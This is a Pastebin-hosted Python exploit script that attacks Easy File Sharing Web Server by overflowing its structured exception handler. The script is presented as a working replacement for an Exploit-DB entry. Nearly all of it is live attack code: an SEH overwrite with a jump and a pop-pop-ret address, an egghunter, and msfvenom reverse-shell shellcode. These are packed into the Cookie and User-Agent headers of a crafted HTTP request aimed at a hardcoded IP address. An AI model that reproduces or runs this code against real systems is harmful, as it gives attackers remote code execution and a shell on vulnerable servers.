Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###############################
- MADE BY:-SARTHAK SAINI
- EXPLOIT :-https://www.exploit-db.com/exploits/42261 ;IT WASN'T WORKING SO I MADE MY OWN
- VULN SOFTWARE:-Easy File Sharing Web Server
- DOWNLOAD LINK:-https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
- REFERENCE:-https://www.youtube.com/watch?v=Znrvsf8Trvg
- ###################################
- SOURCE CODE:-
- import socket
- import os
- import time
- import struct
- import sys
- # IP address of host (set to localhost 127.0.0.1 because we are running it on our VM)
- host = "192.168.42.205"
- # Port of host
- port = 80
- limit=3000
- #jumped 20 bytes to hop SEH
- nseh = "\xeb\x14\x90\x90"
- #pop-pop-ret instruction
- seh = "\x05\x86\x01\x10"
- nops="\x90"*30
- #egghunter
- buff="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
- buff+="\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
- hunter=buff
- #our egg
- egg="w00tw00t"
- #reverse shell
- #msfvenom -p windows/shell_reverse_tcp lhost=127.0.0.1 lport=1234 -f py --smallest -b '\x00'
- buf = ""
- buf += "\x33\xc9\x66\xb9\x43\x01\xe8\xff\xff\xff\xff\xc1\x5e"
- buf += "\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05\x06\x67"
- buf += "\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43\x1e\x98\x46"
- buf += "\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c\xe1\xb3\x1c\x40"
- buf += "\x5e\x21\x08\x05\xe7\xe8\x25\x28\xed\xc9\xde\x7f\x79"
- buf += "\xa4\x62\x21\xb9\x79\x08\xbe\x7a\x26\x40\xda\x72\x3a"
- buf += "\xed\x6c\xb5\x66\x60\x40\x91\xc8\x0d\x5d\xa5\x7d\x01"
- buf += "\xc2\x7e\xc0\x4d\x9b\x7f\xb0\xfc\x90\x9d\x5e\x55\x92"
- buf += "\x6e\xb7\x2d\xaf\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a"
- buf += "\xe8\x3c\x41\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e"
- buf += "\xa3\xfa\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d"
- buf += "\x24\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4"
- buf += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd\xda"
- buf += "\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88\x66\xf7"
- buf += "\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xfc\xfd\xfe\xff\xf0"
- buf += "\xe1\xf2\xe3\xdc\x5f\xb9\x68\x58\x46\x6f\x2c\xd6\xb8"
- buf += "\xd6\xc0\xc0\xc1\xc3\xab\xc6\xc5\xc2\x15\x41\x2f\xa0"
- buf += "\xdb\x9a\x9a\xa6\x56\x75\xa5\xb3\x2c\x01\x50\x16\xa3"
- buf += "\xd4\x26\x94\xd3\xa9\x31\xb6\x2f\x55\x43\xb4\x1c\x31"
- buf += "\x8d\x85\x8a\x8c\xe9\x63\x08\xbb\xba\xb9\xde\x06\x9b"
- buf += "\xe0\xaa\xa2\x17\x0b\x91\x3f\xbd\xde\xc7\xfd\xfc\x73"
- buf += "\xbb\x24\x11\xc4\x03\x40\x51\x56\x51\x5e\x5f\x4c\x5d"
- buf += "\x42\x5b\x58\x5c\x46\x79\x6b\xdf\x2b\x93\xe9\xc2\x91"
- buf += "\xf9\x54\x4d\x5a\xe2\x2e\x77\x28\xa6\x3f\x43\xdb\xf0"
- buf += "\x9d\xd7\x9d\x8b\x7c\x43\x8a\xb8\x93\xb2\xcf\xe4\x0e"
- buf += "\x35\x48\x3f\xb6\xcc\xd8\x4c\x3f\x80\x7b\x2e\x4c\x50"
- buf += "\x2a\x41\x11\xbc\x91"
- #2nd param payload
- buff=egg
- buff+=nops
- buff+=buf
- #1st param payload
- tests="/.:/"
- tests+="A"*53
- tests+=nseh
- tests+=seh
- tests+=nops
- tests+=hunter
- tests+=nops
- tests+="D"*int(3000-len(tests))
- # Craft our HTTP GET request
- request = "GET /vfolder.ghp HTTP/1.1\r\n"
- request += "Host: " + host + "\r\n"
- request += "User-Agent:" + buff + "\r\n" #insert 2nd param here
- request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
- request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
- request += "Accept-Encoding: gzip, deflate" + "\r\n"
- request += "Referer: " + "http://" + host + "/" + "\r\n"
- request += "Cookie: SESSIONID=16246; UserID=PassWD=" + tests + "; frmUserName=; frmUserPass=;" # Insert buffer here
- request += " rememberPass=pass"
- request += "\r\n"
- request += "Connection: keep-alive" + "\r\n"
- request += "If-Modified-Since: Mon, 19 Jun 2017 17:36:03 GMT" + "\r\n"
- print "[*] Connecting to target: " + host
- # Set up our socket connection
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- try:
- # Attempt to connect to host
- connect = s.connect((host, port))
- print "[*] Successfully connected to: " + host
- except:
- print "[!] " + host + " didn't respond...\n"
- sys.exit(0)
- # Send payload to target
- print "[*] Sending payload to target..."
- s.send(request + "\r\n\r\n")
- print "[!] Payload has been sent!\n"
- s.close()
Add Comment
Please, Sign In to add comment